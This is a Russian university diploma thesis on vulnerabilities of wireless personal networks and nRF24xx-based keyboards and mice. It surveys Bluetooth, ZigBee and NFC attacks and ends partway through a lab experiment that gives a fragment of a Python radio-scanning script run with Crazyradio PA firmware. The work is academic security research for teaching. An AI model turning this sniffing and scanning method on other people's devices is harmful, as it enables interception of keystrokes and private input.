Комплексный анализ уязвимостей систем беспроводного взаимодействия

Размещено на http://www.Allbest.ru/

Размещено на http://www.Allbest.ru/

Федеральное агентство связи

Федеральное государственное бюджетное образовательное учреждение высшего образования

Поволжский государственный университет телекоммуникаций и информатики

Факультет телекоммуникаций и радиотехники

Направление (специальность): Информационная безопасность телекоммуникационных систем

Кафедра мультисервисных сетей и информационной безопасности

Выпускная квалификационная работа (дипломная работа)

Тема:

Комплексный анализ уязвимостей систем беспроводного взаимодействия

Разработала И.М. Смакова

Студентка группы ИБТС-12

Руководитель доцент,

к.т.н. А.С. Раков

Самара 2017



ЗАДАНИЕ

по подготовке выпускной квалификационной работы

Студентки Смаковой Инары Маратовны

Тема ВКР Комплексный анализ уязвимостей систем беспроводного взаимодействия

Утверждена приказом по университету от 28.10.2016 №265-2

Срок сдачи студентом законченной ВКР 28.01.17

Исходные данные и постановка задачи

1) Научно-техническая литература по предмету исследования

2) Обзор наиболее популярных способов беспроводного взаимодействия

3) Анализ уязвимостей основных беспроводных стандартов

4) Классификация атак на персональные беспроводные сети

5) Реализовать экспериментальную часть, проверить защищенность беспроводных взаимодействий на базе чипа семейства nRF24xx от элементарных атак

6) Сформулировать рекомендации по защите информации для беспроводных устройств ввода

Перечень подлежащих разработке в ВКР вопросов или краткое содержание ВКР.

1) Классификация стандартов беспроводного взаимодействия

2) Особенности защиты персональных беспроводных сетей

3) Примеры атак на персональные беспроводные сети

4) Реализовать экспериментальную часть (лабораторный стенд)

5) Рассмотреть элементарные атаки на беспроводные устройства ввода, построенные на базе чипа из семейства nRF24xx

6) Сформулировать рекомендации по защите информации для беспроводных устройств ввода

Перечень графического материала

Приложение А - Иллюстрационный материал, представленный на защиту

Дата выдачи задания «28» октября 2016 г.

Кафедра: Мультисервисные сети и информационная безопасность

Руководитель доцент к.т.н. 28.10.16 А.С. Раков

Задание принял к исполнению ИБТС-12 28.10.16 И.М. Смакова



РЕФЕРАТ

Название: Комплексный анализ уязвимостей систем беспроводного взаимодействия

Автор: Смакова Инара Маратовна

Научный руководитель: Раков Александр Сергеевич

Ключевые слова: Анализ уязвимостей, уязвимости беспроводных сетей, персональные беспроводные сети, NRF24xx, атаки на беспроводные устройства на базе чипа NRF24xx.

Библиографическое описание

Смакова, И.М. Комплексный анализ уязвимостей систем беспроводного взаимодействия [Текст]: дипломная работа / И.М. Смакова. Поволжский государственный университет телекоммуникаций и информатики (ПГУТИ). Факультет телекоммуникаций и радиотехники (ФТР). Кафедра мультисервисных сетей и информационной безопасности (МСИБ): науч. рук. А.С. Раков - Самара, 2017. - 90 с.

Аннотация: ВКР содержит 90 страниц, включая приложения, 24 рисунка, 2 таблицы, а также использовано 13 различных источников информации. В работе рассматривались уязвимости основных беспроводных стандартов, а также анализ защищенности нестандартного радиочастотного взаимодействия на примере чипа семейства nRF24xx. В процессе выполнения работы был создан лабораторный стенд, позволяющий производить элементарные атаки на беспроводные устройства ввода, построенные на базе чипа из семейства nRF24xx. Результатом работы является возможность создания лабораторных работ для студентов.



ВВЕДЕНИЕ

Беспроводные сети - сети, получившие огромное развитие в области передачи данных, как среди пользователей, так и в корпоративной среде. Применение беспроводных технологий повсеместно: рестораны, аэропорты, университеты, организации, что объясняется удобством использования, а также недорогим решением. На сегодняшний день существует множество узконаправленных беспроводных технологий, наиболее известные из них: Bluetooth, ZigBee, NFC. Данная тема является актуальной, так как беспроводные технологии стали неотъемлемой частью жизни людей. При этом не стоит забывать о таком важном факторе, как безопасность беспроводных сетей, которая зависит от ряда использованных технологий (шифрование, пароли, цифровые подписи и т.д.).

Целью данной дипломной работы является рассмотрение основных уязвимостей персональных беспроводных сетей, анализ защищенности нестандартного радиочастотного взаимодействия на примере чипа семейства nRF24xx. Для достижения цели необходимо решить следующие задачи:

- обзор наиболее популярных способов беспроводного взаимодействия;

- анализ уязвимостей основных беспроводных стандартов;

- классификация атак на персональные беспроводные сети. Выявление закономерностей;

- экспериментально проверить защищенность беспроводных взаимодействий на базе чипа семейства nRF24xx от элементарных атак.

Объектом исследования является WPAN сети, а также элементарные атаки на персональные беспроводные сети.

Предмет исследования - анализ работы и характеристик сети, с помощью стенда на основе семейства чипов nRF24xx.

Источники информации - учебная, научная и научно-техническая литература, а также электронный ресурс.

Дипломная работа включает в себя пять глав, введение, заключение и список использованных источников.

В первой главе рассматриваются основы персональных беспроводных сетей, топология, область применения. Во второй главе описывается классификация стандартов беспроводного взаимодействия, а также их особенности. В третьей главе описывается механизмы защиты персональных беспроводных сетей. В четвертой главе приведены примеры атак на WPAN сети. В пятой главе исследованы и проанализированы основные элементарные атаки с помощью стенда, а также приводятся рекомендации по обеспечению безопасности беспроводных сетей.

В заключении приведены основные выводы по проделанной работе.



1. Основы беспроводных сетей

На сегодняшнем этапе развития беспроводных технологий выделяют несколько типов беспроводных сетей:

- Wireless Personal Area Network (WPAN). Сети WPAN (внутренний круг на рис. 1.1) предназначены для использования в системах, в которых необходимо обеспечить небольшие затраты энергии при передаче, при этом радиус действия данных сетей также является небольшим (до 30 м.). Подобные решения актуальны для передачи информации от портативных компьютеров, мобильных устройств, сенсоров (видеокамер, датчиков и т.п.) и различных бытовых устройств

- Wireless Local Area Network (WLAN). Сети типа WLAN (средний круг на рис. 1.1) характерны для небольших предприятий и зданий. Протяженность линии связи до 500 м.

- Wireless Wide Area Network (WWAN). Сети типа WWAN (внешний круг на рис. 1.1) предназначены для использования в сетях, которые позволяют обеспечить доступ во Всемирную сеть, при этом для этой сети характерна большая зона обслуживания (до 40 км). В сетях WWAN для передачи данных используется технологии сотовой связи GSM, GPRS, 3G, CDMA и т.д.

Рис. 1.1 Радиус действия персональных, локальных и глобальных беспроводных сетей

При построении беспроводных сетей типа WPAN, WLAN нет необходимости частотного планирования с другими сетями, которые работают в этом же диапазоне частот, поскольку данные сети работают в нелицензированном диапазоне частот 2,4 и 5 ГГц. Однако системы широкополосного беспроводного доступа - Broadband Wireless Access (BWA) способны использовать как лицензионные, так и нелицензионные диапазоны частот (от 2 до 66 ГГц) [3].

Рис. 1.2 Классификация беспроводных технологий

1.1 Персональные беспроводные сети доступа WPAN

Сети WPAN предназначены для беспроводного соединения в пределах рабочей зоны. Не смотря на небольшой радиус действия данной сети, сети WPAN позволяют упростить повседневную работу, так как становится возможным избавиться от проводов для подключения к компьютеру клавиатуры, мыши, наушников и т.п. Важным аспектом при разработке чипов для WPAN является вопрос энергопотребления, поскольку небольшие размеры устройств не позволяют мощные аккумуляторы.

WPAN может быть развернута с использованием различных сетевых технологий, например, Bluetooth, NFC, ZigBee, Z-Wave.

Персональные беспроводные сети - сети, стандарт которых разработан рабочей группой IEEE 802.15. Ниже (в таблице 1) представлены характеристики некоторых стандартов группы IEEE 802.15 [2].

Таблица 1

Сравнение стандартов семейства IEEE 802.15

Протокол беспроводной связи IEEE 802.15.3 использует полосу частот 2,4 ГГц, а так же тип модуляции OQPSH (Offset Quadrature Phase). Благодаря этой технологии модуляции получается достигать около 245 пользователей при одновременной работе в сети, при этом скорость передачи данных составляет 55 Мбит/с на расстоянии до 100 м. [12].

Достоинством этой сети является автоматическое переключение каналов, в случае возникновения помех со стороны других сетей или бытовых устройств.

IEEE 802.15.4a/b - стандарт технологии UWB (Ultra Wideband), с помощью которого можно создавать специальные сети, в которых сверхширокополосных устройств смогут поддерживать связь между любыми узлами. В данном стандарте передача закодированных импульсов осуществляется в широком диапазоне частот (от 3,1 до 10,6 ГГц) при очень малой мощности (0,05 мВт) и малой длительности. Высокоскоростные UWB- устройства предназначены для работы с данными, требующими быстрой пересылки. Низкоскоростное UWB-оборудование применяется для обнаружения местонахождения владельца беспроводного устройства.

1.2 Топология персональных беспроводных сетей

Существуют различные топологии беспроводных сетей: точка-точка, кольцо, двунаправленное кольцо, дерево, звезда, многоярусная звезда и т.п.

Топология «точка-точка» - самый простой вариант организации сети из двух устройств. Как правило, узлы этой сети являются равноправными, то есть сеть одноранговая (топология характерна для Bluetooth).

Существуют три различных типа устройств сети, задействованные в сети: маршрутизатор, координатор и конечное устройство [10].

Рис. 1.3 Типичные топологии сети и принятые обозначения

Координатор персональной сети (PAN Coordinator) - служит для формирования пути древа сети, однако может связываться с другими сетями. Он может хранить информацию о сети, включая хранилище секретных паролей.

Маршрутизатор (Full Function Device) - может выступать в качестве промежуточного звена, передавая данные с других устройств, а также может запускать функцию приложения.

Конечное устройство (Reduced Function Device) - его функциональная нагруженность позволяет ему обмениваться информацией с материнским узлом (или координатором, или с маршрутизатором). Конечное устройство не может передавать данные с других устройств, поэтому узел большую часть времени пребывает в спящем состоянии, что позволяет экономить энергоресурс батарей.

Процесс формирования сети ZigBee:

- координатор инициирует начало формирования сети;

- координатор определяет уровень энергии на всех доступных частотных каналах.

- выбирается канал с наименьшим уровнем энергии.

Выбрав канал, координатор определяет наличие в нем других работающих сетей и их идентификаторы через обращение к узлам этих сетей. Затем PAN координатор случайным образом выбирает идентификатор для своей сети из диапазона 0x0000-0x3FFE так, чтобы он не совпал с идентификаторами других сетей в том же частотном диапазоне. Сетевой шестнадцатибитный адрес координатора всегда равен 0x0000. После этого координатор разрешает присоединяться к своей сети другим устройствам. Другим устройствам приходит ответ от координатора на предмет доступных сетей. Присоединив некоторое количество первых конечных устройств и роутеров, координатор отказывается присоединять непосредственно к себе остальных, оставшиеся вынуждены искать уже присоединившиеся к координатору роутеры (конечные устройства не могут никого присоединять) и присоединяться к ним. Таким образом, начинает ветвиться дерево присоединений. Предпочтение в родительские узлы отдается тем, от кого меньше всего остается переходов к координатору.

В случае топологии звезда коммуникации устанавливаются между отдельными устройствами и координатором PAN. Координатор PAN может выполнять несколько действий: он может быть ориентирован на приложения, а также он может быть использован для инициализации, завершения или маршрутизации в сети. В процессе коммуникаций сетевое устройство, ассоциируясь с одним из приложений, является либо отправителем, либо получателем.

Топология peer-to-peer (P2P) также работает с координатором PAN. Обмен данными сетевые устройства осуществляют, если существуют соответствующие каналы.

Топология P2P позволяет формировать более сложные сетевые конфигурации. Выделяют древовидные (кластерное дерево: claster tree) и ячеистые (смешанная: mesh) структуры. Сеть P2P может быть самоорганизующейся и самовосстанавливающейся.

Эта топология позволяет организовать и многошаговые маршруты доставки сообщений от одного сетевого устройства другому [9].



2. Классификация стандартов беспроводного взаимодействия

В современных беспроводных сетях используется большое количество протоколов передачи данных.

В рамках данной работы рассмотрим наиболее распространенные короткодействующие в настоящее время технологии Bluetooth, ZigBee и NFC. Однако основное внимание уделим беспроводному взаимодействию устройств на основе семейства чипов nRF24xx от норвежской компании Nordic Semiconductor, поскольку данные устройства на сегодняшний день активно продвигаются на рынке беспроводных технологий, и, по всеобщему мнению, являются более защищенными по сравнению с аналогами.

2.1 Технология Bluetooth

Технология Bluetooth была разработана в 1994 году группой ведущих компаний Ericsson, IBM, Intel, Toshiba и Nokia. Ее основной целью являлась замена кабельных интерфейсов телефонов, а также для обеспечения дешевой, устойчивой, эффективной связи.

Особенности технологии Bluetooth:

- технология Bluetooth основана на радиоволнах в частотном диапазоне 2,4 ГГц;

- поддерживается одновременная связь между несколькими устройствами;

- работа при небольшом расстоянии устройств друг от друга;

- скорость передачи данных составляет 2-3 Мбит/с;

- автоматическая установка соединения между Bluetooth-устройствами, находящимися в пределах досягаемости;

- для сопрягаемых устройств не требуется прямой видимости.

Технология Bluetooth использует приемопередатчики небольшого радиуса действия (около 10-15 м), либо в само устройство встроен приемопередатчик, либо подключаемый через свободный порт. В зависимости от мощности передатчика, устройства Bluetooth делятся на три класса:

- класс 1 - до 100 мВт (дальность на открытом пространстве до 100 м);

- класс 2 - до 2,5 мВт (дальность на открытом пространстве до 15 м);

- класс 3 - до 1 мВт (дальность на открытом пространстве до 5 м);

Передатчик переходит с одной рабочей частоты на другую по псевдослучайному алгоритму для того чтобы избежать конфликт с другими устройствами. Временные интервалы (тайм-слоты) развертываются для синхронных пакетов, каждый из которых передается на своей частоте радиосигнала [7].

2.2 Технология ZigBee

ZigBee - беспроводная короткодействующая технология, базирующаяся на стандарте IEEE 802.15.4. Данная технология была создана для обеспечения более дешевого и менее энергоемкого решения по сравнению с другими WPAN-технологиями, в частности с Bluetooth. Протоколы ZigBee разработаны с целью энергосбережения: большую часть времени устройства находятся в спящем режиме и только изредка проверяют, поступили ли к ним обращения. Дальность связи между двумя аппаратами составляет до 75 м.

Протокол ZigBee реализуются в микросхеме трансивера, который используется как самостоятельное устройство для организации связи точка-точка или звезда. Для организации полноценной сети ZigBee к трансиверу необходимо добавить микроконтроллер, в который должен быть загружен набор управляющих программ.

Сеть ZigBee обеспечивает гарантированную доставку пакетов и защиту передаваемой информации, но имеет небольшую скорость передачи информации (скорость передачи данных вместе со служебной информацией в эфире составляет 250 кбит/c). Стандарт ZigBee работает в частотных диапазонах 868 МГц, 915 МГц и 2,4 ГГц, при этом наибольшая скорость передачи информации и хорошая помехоустойчивость достигаются в диапазоне 2,4 ГГц. Поэтому большинство производителей выпускают трансиверы ZigBee для этого диапазона [5].

2.3 Технология NFC

NFC-технология короткодействующей беспроводной связи, позволяющая обмениваться данными между устройствами, которые находятся на расстоянии 4-10 см. Технология NFC является расширением стандарта бесконтактных карт ISO 14443, объединяющая считыватель с интерфейсом смарт-карты в одно устройство. Основное назначение технологии NFC ориентировано на использование в мобильных устройствах: в качестве платежного средства (виртуальный кошелёк, бонусная карта), проездного билета или средства для идентификации субъекта.

На данном этапе развития NFC наиболее популярные следующие режимы использования технологии в мобильных устройствах: эмуляция карт, режим считывания и режим Р2Р [8].

При использовании режима эмуляция карт мобильное устройство выступает в роли пропуска, либо платежной карты. В режиме считывания, мобильное устройство считывает пассивную метку, например, метка на постере, выступающая для интерактивной рекламы. В режиме Р2Р происходит обмен информацией между двумя устройствами. По сравнению с технологией Bluetooth основным преимуществом данной технологии является короткое время соединения, которое составляет одну десятую секунды, однако NFC поддерживает скорость передачи информации 424 Кбит/сек, что намного меньше, чем у Bluetooth.



2.4 Нестандартные радиочастотные взаимодействия

Как отмечалось выше, основное внимание в данной работе уделим беспроводному взаимодействию устройств на основе семейства чипов nRF24xx от норвежской компании Nordic Semiconductor.

Актуальность данных чипов растет не только благодаря высокой защищенности беспроводных устройств по сравнению с аналогами, но и соотношение цен.

Микрочипы nRF24L01+ работают в диапазоне частот 2,4 ГГц, скорость передачи данных составляет до 2 Мбит/с. Радио-модули, сделанные на основе этих чипов, изготавливаются в Китае большими партиями. Данные радио-модули имеют стандартный разъем для подключения, поэтому они легкозаменяемые. Ценовой диапазон таких модулей составляет около 20 долларов. Сравнивая с радио-модулями Bluetooth, микрочипы nRF24L01+ стоят на порядок дешевле, это и является определяющим фактором для производителей [9].



3. Особенности защиты персональных беспроводных сетей

При прохождении коммуникационных сигналов через радиоэфир становится вопрос о безопасности беспроводных сетей, так как злоумышленник может перехватить информативные сигналы.

3.1 Аутентификация и безопасность технологии Bluetooth

В технологии Bluetooth аутентификация базируется на алгоритме запрос-ответ, при этом возможна как односторонняя, так и двусторонняя аутентификация, либо соединение совсем ее не потребует. Шифрование данные используется для обеспечения безопасности соединения. В технологии Bluetooth используются потоковый шифр с секретным ключом, длина которого порядка 64 бит. В зависимости от выполняемых задач, устройство может находиться в одном из трех режимов защиты:

· устройство не может самостоятельно инициировать защитные процедуры;

· устройство не инициирует защитные процедуры, пока не установлено и не настроено соединение. После того как соединение установлено, процедуры защиты обязательны и определяются типом и требованиями используемых служб;

· защитные процедуры инициируются в процессе установления и настройки соединения. Если удаленное устройство не может пройти требований защиты, то соединение не устанавливается.

В основе системы безопасности Bluetooth, используемой в третьем режиме, лежит понятие сеансового ключа, который образуется в процессе соединения двух устройств и используется для идентификации и шифрования передаваемых данных. Для генерации ключа могут использоваться самые различные составляющие, от заранее известных обоим устройствам значений до физических адресов устройств.

При использовании второго и третьего режима совместно, повышается безопасность соединения устройств, так как сначала устанавливается защищенное соединение, а потом дополнительно защищается в соответствии с конкретными требованиями и возможностями конкретной службы. Тем не менее, считается, что очевидной слабостью Bluetooth с точки зрения построения защищенных соединений остается возможность перехвата трафика.

3.2 Архитектура безопасности технологии Zigbee

В ZigBee безопасность конфиденциальной информации реализована следующим образом: для шифрования используются секретные ключи, длина которых составляет до 128 бит. Ключ может быть получен путем предварительной установки, соглашения или передачи. Основой безопасного соединения являются доверительные отношения между сторонами на протяжении всего сеанса связи. Создание ключа канала связи связано на использовании главного ключа, который контролирует соответствие ключей каналов связи. Распределение ключей происходит в центре управления безопасностью, который поддерживает сетевые ключи и обеспечивает безопасность точка-точка. Устройства могут использовать сетевые ключи, переданные центром управления безопасностью даже не через защищенный на момент передачи канал.

3.3 Архитектура безопасности технологии NFC

Благодаря особенности технологии NFC: работа исключительно на близком расстоянии, становится возможным предотвратить утечку информации или списание денежных средств. Также, NFC- платежи с помощью мобильных устройств используют механизмы защиты логической и физической безопасности, которые используются для бесконтактных карт:

- для подтверждения транзакции необходимо ввести PIN-код в приложении;

- платформы удаленного управления могут мгновенно блокировать любые платежные приложения так же, как банки блокируют платежные карты;

- при работе с электронным кошельком необходимо подтвердить операцию с помощью одноразового пароля, высланного на мобильное устройство [11].



4. Примеры атак на персональные беспроводные сети

Сегодня беспроводные сети являются одним из основных способов коммуникации устройств, и поэтому необходимо задуматься о их защите. Бороться со злоумышленниками, атакующими беспроводные сети, весьма непросто, поскольку невозможно ни отследить их физическое местоположение, ни изолировать их от сети.

В этой главе будут рассмотрены общие виды атак, направленных на беспроводные сети.

Существует множество различных атак на беспроводные сети, однако необходимо выделить ряд атак называемых элементарными. К элементарным атакам относятся:

- Scanning - данная атака направлена на мониторинг состояния радиоэфира и определения работающих в нем устройств, а также на определение параметров передачи (частоты передачи, адреса устройств, тип кодирования);

Рис. 4.1 Атака Scanning

- Sniffering - атака направлена на перехват информации, передаваемой по радиоканалу, с возможностью её дальнейшего анализа и обработки;



Рис. 4.2 Атака Sniffering

- Spoofing - атака направлена на подмену одной из сторон радиообмена путем фальсификации информации-идентификатора. Злоумышленник убеждает легитимного участника информационного обмена в том, что он также является легитимным пользователем;

Рис. 4.3 Атака Spoofing

- Mapping - атака направлена на поиск возможных портов (интерфейсов радио-взаимодействия), которые могут участвовать в информационном обмене. На основании данной информации злоумышленник составляет карту атакуемой системы, определяет параметры задействованных интерфейсов и делает вывод о возможных способах воздействия на них;

Рис. 4.4 Атака Mapping

- Replay - атака направлена на перехват и дальнейшее воспроизведение информации, переданной легитимным пользователем системы. Обычно данная атака используется злоумышленником для повторного прохождения идентификации или аутентификации, когда ключевая информация, переданная пользователем, используется злоумышленником для авторизации в системе;

Рис. 4.5 Атака Replay

- Injection - атака направлена на внедрение в передаваемую пользователем информацию, собственной, обычно, вредоносной информации или в передаче вредоносной информации под видом легитимной;

Рис. 4.6 Атака Injection

- DOS (Denial of Service - отказ в обслуживании) - атака направлена на блокирование работы системы путем загрузки канала передачи побочной информацией таким образом, чтобы система не успевала реагировать на запросы легитимных пользователей.

Рис.4.7 Атака Denial of Service

Показательность данной классификации элементарных атак состоит в том, что, обычно, все, даже самые сложные атаки на беспроводные технологии представляют собой элементарные атаки и их различные комбинации.



В настоящее время известно более полутора десятка возможных атак, использующих уязвимости Bluetooth на разных уровнях протокола связи. Алгоритмы шифрования, используемые при аутентификации и передаче информации между устройствами имеют некоторые уязвимости. Рассмотрим некоторые атаки более подробно.

Атака со взломом PIN-кода. Данная атака злоумышленниками во многих случаях реализуется без особых усилий, поскольку PIN- код, используемый для защиты соединения, большинством пользователей не меняется, так как они не знают о необходимости защиты своего Bluetooth-соединения. Поэтому для реализации этой атаки злоумышленнику остается лишь попробовать осуществить подключение, используя PIN-код по умолчанию. С помощью PIN- кода злоумышленник может беспрепятственно расшифровать все данные, а так же с легкостью обходить аутентификацию пользователя, получая доступ к устройству. Данная атака представляет из себя комбинацию элементарных атак, таких как Sniffering (злоумышленник перехватывает пакеты переданные по радиоканалу, а затем, подобрав PIN-код, расшифровывает их) и Spooffing (подобрав PIN-код, злоумышленник без труда может выдать себя за легитимного участника информационного обмена).

Атака «человек посередине» на сопрягаемые Bluetooth-устройства. Атака «человек посередине» наиболее часто встречающаяся атака, при которой злоумышленник разрывает канал связи и встраивается между абонентами. Злоумышленник может подслушивать, перехватывать и преобразовывать информацию, после чего отправляет измененные сообщения. В результате абоненты не замечают, что произошла подмена и, что теперь общаются не друг с другом, а со злоумышленником. В данной атаке также представлена комбинация элементарных атак: Sniffering (злоумышленник перехватывает информацию от передатчика, для дальнейшего анализа пакетов), DoS (злоумышленник препятствует радиообмену между передатчиком и приемником, с целью не дать им нормально взаимодействовать и навязать своё воздействие), Spooffing (злоумышленник выдает себя за авторизованного участника взаимодействия, чтобы воздействовать на другого участника), Injection (злоумышленник навязывает жертве свою информацию) [4].

Ложная точка доступа. Данная атака может быть воспроизведена в любом месте скопления людей при помощи мобильного устройства. Злоумышленник маскирует свою точку доступа под легитимную. Это делается для того, чтобы пользователи, увидев точку доступа, не требующую введения пароля, подключались именно к ней. После этого злоумышленник сможет перехватить данные с этого устройства. Кроме того, у многих пользователей стоят стандартные настройки, и поэтому подключение к ложной точке может произойти, не запросив разрешения пользователя (автоматически меняется точка подключения к сети, например из-за плохого сигнала).

Для того чтобы вызвать интерес к своей точке злоумышленнику достаточно заглушить радиосигнал легитимной точки при помощи специального оборудования.

4.1 Атаки на технологию ZigBee

ZigBee - беспроводной стандарт, при помощи которого устройства, подключенные к интернету вещей общаются друг с другом. Исследователям венской компании Cognosec удалось обнаружить в ZigBee серьезную уязвимость, которая способна поставить под угрозу любой умный дом.

Компрометация умного дома заключается в том, что производители используют дефолтные ключи связи для своих устройств: погоня за совместимостью с устройствами других производителей, а также дешевизна и удобство использования, что ставит под угрозу безопасность сети в целом. При помощи простого сниффинга, атакующий способен перехватить обмен ключами и внедриться в сеть, используя дефотный ключ. В итоге, устройства оказываются открыты для атаки «человек посередине, а сеть, активный сетевой ключ и все коммуникации внутри сети -- скомпрометированы.

Атака на ZigBee Light Link. Данный метод атаки заключается во внедрении в «умные лампы» от компании Philips Hue вирусной программы, для того чтобы удаленно подключиться к системе. Достаточно внедрить в одну лампу программу-вирус, который способен распространится на другие устройства от компании Philips Hue. Таким образом, злоумышленник перехватывает управление устройствами (злоумышленник может включать и выключать устройства), а так же выводить их из строя. Специалистам удалось извлечь AES-CCM ключ, используемый компанией Philips для шифрования и защиты прошивки своих ламп.

Для заражения ламп было загружено вредоносное программное обеспечение, используя ключ AES-CCM.

4.2 Атаки на устройства, использующие NFC

NFC используется и в России. Например, NFC применяется в московском метрополитене - мобильное устройство можно использовать для оплаты проезда, как транспортную карту. Однако быстрое распространение NFC привело к тому, что мобильные телефоны приобрели ряд уязвимостей, присущих новой технологии.

Недостатками NFC являются слабая защищённость данных от перехвата и атаки ретрансляции.

Скимминг банковских карт. Как только устройство в банкомате обнаружило карту, считывается служебная информация, которая затем используется для совершения платежей. Злоумышленник может установить дополнительный картридер, который будет считывать информацию с карт посредством NFC-протокола, а затем передавать ее «родному» устройству банкомата. Такая атака является одним из примеров атаки «человек посередине». Злоумышленник, вернувшись к банкомату, может снять устройство считывания карт и получить информацию обо всех картах, которые использовались в течение дня. В дальнейшем он может использовать эту информацию в своих целях.

Помимо скимминга банковских карт, существует скимминг афиш, которые зачастую используются для рекламы. NFC-устройство прикладывается к определенному месту постера для скачивания информации. Однако это является небезопасным так как злоумышленник, используя электронный плакат, может установить на ваш телефон вредоносную программу [6].

Атака повторного вопроизведения. Этот вид атаки ставит под угрозу безопасность компаний, которые используют NFC-карты для идентификации клиентов и сотрудников, так как эти карты могут использоваться для прохода в здание. Злоумышленник может считать информацию с карты и сделать её копию или использовать свой телефон для проникновения в здание.

Атака на Android-смартфон. Был продемонстрирован способ на хакерской конференции Black Hat , при котором в общественном месте, например, возле платежного терминала с поддержкой NFC, устанавливается миниатюрная NFC-метка, которая не требует собственной батареи для поддержания работоспособности.

Метка побуждает мобильное устройство перейти на вредоносный сайт, при этом в автоматическом режиме на устройство скачивается вредоносный код, и злоумышленник получает полный контроль над устройством.

Алгоритм работы данной пассивной атаки: метка активируется, если вблизи появляется устройство с поддержкой. Затем радиоволны, которые излучает модуль NFC, индуцируются в виде электрического тока на антенне, встроенной в метку, и этой энергии хватает, чтобы послать модулю NFC в смартфоне ответный сигнал.

защищенность нестандартный радиочастотный беспроводный



5. Эксперимент

Как было отмечено выше, существует обширный спектр атак на стандарты беспроводного взаимодействия, однако большинство из них хорошо изучены и поэтому не представляют большой угрозы, поскольку для них разработаны средства и методы защиты. Одной из главных задач данной работы является анализ уязвимостей беспроводной технологии, реализуемой на базе чипа nRF24xx, который в последнее время стал бесспорным лидером на рынке беспроводных устройств ввода. В качестве доказательства можно привести анализ чипов используемых в беспроводных устройствах различных производителей (таблица 5.1) [13].

Таблица 5.1

Электронные компоненты используемые для передачи радиосигналов в клавиатурах различных вендоров

Наименование продукта	Чип, использованный в устройстве	USB-донгл
Cherry AES B.UNLIMITED	nRF24LE1	nRF24LU1+
Logitech MK520	nRF24LE1	nRF24LU1+
Perixx PERIDUO-710W	nRF24LE1H (OTP)	nRF24LU1+
Microsoft Wireless Desktop 2000	nRF24LE1H (OTP)	nRF24LU1+
Dell KM714	nRF24LE1	nRF24LU1+
HP Wireless Elite v2 keyboard	nRF24LE1H (OTP)	nRF24LU1+
Fujitsu Wireless Keyboard Set LX901	CYRF6936	CYRF6936
Gigabyte K7600 wireless keyboard	nRF24LE1H (OTP)	nRF24LU1+
Lenovo 500 Wireless Mouse (MS-436)	nRF24LE1	nRF24LU1+
AmazonBasics Wireless Mouse MG-0975	nRF24LE1	nRF24LU1+

Как видно из таблицы большинство производителей (девять из десяти) для организации радиосвязи между устройством и донглом для подключения к компьютеру используют чип nRF24xx. Это объясняется, прежде всего, ценой данного решения, а также его надежностью передачи данных по радиоканалу. Однако в реализации чипа отсутствуют штатные механизмы защиты, поскольку производитель позиционирует чип лишь как устройство физического уровня передачи, подразумевая, что безопасность будет реализована на более высоких уровнях.

Большинство производителей устройств ввода действительно принимают ряд мер для защиты информации, передаваемой по открытому радиоканалу. Наиболее популярным методом защиты является шифрование с использованием алгоритма AES-128, то есть алгоритма AES (Advanced Encryption Standard) c длиной ключа 128 бит. Данный алгоритм шифрования является достаточно надежным и устойчивым к атакам полного перебора (количество ключевых комбинаций 3,4·10³⁸).

Кроме того на базе чипа реализован механизм перестройки по частоте, созданный прежде всего для обеспечения надежности передачи (при анализе помеховой обстановки выбирается свободный канал для передачи и в случае появления помехи на используемой частоте приемник и передатчик синхронно перестраиваются на другую частоту по фиксированному алгоритму перестройки), но данный механизм может использоваться и в целях безопасности - канал может периодически изменятся, тем самым затрудняя для злоумышленника перехват передаваемых данных.

К сожалению, большинство мер защиты, принимаемых производителями устройств ввода информации являются недостаточными или малоэффективными.

В ходе выполнения эксперимента были проведены пробные атаки в целях обнаружения уязвимостей устройств ввода (клавиатур и мышей) нескольких известных производителей:

- «Microsoft» (комплект «Microsoft Wireless Desktop 2000»);

- «Lenovo» (мышь «Lenovo K500»);

Все вышеперечисленные устройства оборудованы чипом из семейства nRF24, все производители клавиатур используют для шифрования алгоритм AES-128, однако канал передачи информации от мыши не защищен не у одного из представленных вендоров.

В качестве эксперимента были проведены пробные атаки на каждое из устройств. Все атаки основывались на элементарных атаках. В качестве атакующего оборудования был выбран внешний ПК, к которому было подключено устройство «Crazyradio PA» (рис. 5.1).

Рис. 5.1 - Внешний вид устройства «Crazyradio PA»

Устройство построено на базе чипа nRF24LU1+ и оборудовано встроенным малошумящим усилителем на 20 dBm, а также антенным разъемом RP-SMA, кроме того в комплекте с устройством идет всенаправленная пассивная антенна, что увеличивает дальнодействия устройства со стандартных 10-15 метров до 100-200 метров. Таким образом, злоумышленнику не нужно находиться в непосредственной близости от атакуемого устройства. Ещё одним плюсом «Crazyradio PA» является открытость исходного кода и возможность изменения стандартной (заводской) микропрограммы («прошивки») через интерфейс USB без необходимости выпаивания микроконтроллера.

В качестве альтернативной «прошивки» использовалась микропрограмма «nrf-research-firmware» от компании «Bastille`s», написанная на языке «Python». Данная микропрограмма позволяет использовать устройство в двух режимах: приемника и передатчика, кроме того она позволяет работать с устройством по средствам стандартных библиотек операционных систем семейства «Linux» и языка программирования «Python». С помощью данного набора технических средств и программного обеспечения были предприняты попытки проведения элементарных атак на беспроводные устройства.

5.1 Атака - сканирование

Одной из самых простых атак, которые можно провести с использованием данного набора технических средств и программного обеспечения является сканирование или Scanning. При осуществлении данной атаки злоумышленник выполняет сканирование целевого радиочастотного диапазона для выявления работающих в нем устройств, а также их основных параметров. Для осуществления данной атаки был написан скрипт на языке «Python», фрагмент листинга приведен далее:

# Производится импорт внешних библиотек

import time, logging

from lib import common

Подключение внешних библиотек необходимо для обеспечения взаимодействия программы и устройства

# Выделение префикса адреса

prefix_address = common.args.prefix.replace(':', '').decode('hex')

if len(prefix_address) > 5:

raise Exception('Invalid prefix address: {0}'.format(args.address))

Функция предусмотрена для более тонкой настройки сканирования, например, если злоумышленнику известен производитель беспроводного устройства, то он может вычислить определенную часть MAC-адреса устройства и, задав данную часть программе, сократить объём сканирования и исключить из него посторонние устройства

# Перевод радио-модуля в режим с нечетким адресом

common.radio.enter_promiscuous_mode(prefix_address)

Данное действие необходимо для получения возможности принимать пакеты адресованные жертве

# Установка начального канала

common.radio.set_channel(common.channels[0])

Данная функция необходима для более тонкой настройки сканирования, если злоумышленнику известен конкретный частотный диапазон работы устройств (по умолчанию данное значение равно 0)

# Переключение между каналами и декодирование пакетов ESB (шина

унифицированного, событийного обмена) в псевдослучайном режиме

last_tune = time.time()

channel_index = 0

while True:

# Увеличение номера канала

if len(common.channels) > 1 and time.time() - last_tune > dwell_time:

channel_index = (channel_index + 1) % (len(common.channels))

